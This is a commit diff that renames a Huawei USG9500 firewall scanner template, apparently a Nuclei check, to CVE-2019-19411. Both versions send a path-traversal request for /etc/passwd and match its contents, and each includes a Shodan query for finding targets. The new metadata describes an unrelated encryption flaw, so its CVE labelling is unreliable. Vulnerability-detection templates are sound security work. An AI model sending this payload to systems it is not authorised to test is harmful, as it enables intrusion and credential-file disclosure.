Merge pull request #10858 from geeknik/patch-9

Update and rename huawei-firewall-lfi.yaml to CVE-2019-19411.yaml
2024-10-05 12:23:13 +04:00 · 2024-10-05 12:23:13 +04:00 · be75667ece
parent ea4eb34223 09220d7f48
commit be75667ece
2 changed files with 46 additions and 38 deletions
--- a/http/cves/2019/CVE-2019-19411.yaml
+++ b/http/cves/2019/CVE-2019-19411.yaml
@ -0,0 +1,46 @@
+id: CVE-2019-19411
+
+info:
+  name: Huawei Firewall - Local File Inclusion
+  author: taielab
+  severity: low
+  description: |
+    USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
+  reference:
+    - https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 3.7
+    cve-id: CVE-2019-19411
+    cwe-id: CWE-665
+    epss-score: 0.00078
+    epss-percentile: 0.34692
+    cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: huawei
+    product: usg9500
+    shodan-query: title:"HUAWEI"
+  tags: cve,cve2019,huawei,firewall,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/umweb/../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200
--- a/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml
+++ b/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml
@ -1,38 +0,0 @@
-id: huawei-firewall-lfi
-
-info:
-  name: Huawei Firewall - Local File Inclusion
-  author: taielab
-  severity: high
-  description: Huawei Firewall is vulnerable to LFI(Local File Inclusion)
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
-    cwe-id: CWE-22
-  metadata:
-    verified: true
-    max-request: 1
-    shodan-query: title:"HUAWEI"
-  tags: huawei,firewall,lfi
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/umweb/../etc/passwd"
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        part: body
-        regex:
-          - "root:[x*]:0:0:"
-
-      - type: word
-        part: header
-        words:
-          - "application/octet-stream"
-
-      - type: status
-        status:
-          - 200
-# digest: 490a0046304402203715844af65d7d74d1aeca35c55b6c24a7cbfa49fa1a202ff28631bb9ee56913022069383aa92060d5f57f72215e131edaa486e6b8a773e18332ebce0d6af51d5829:922c64590222798bb761d5b6d8e72950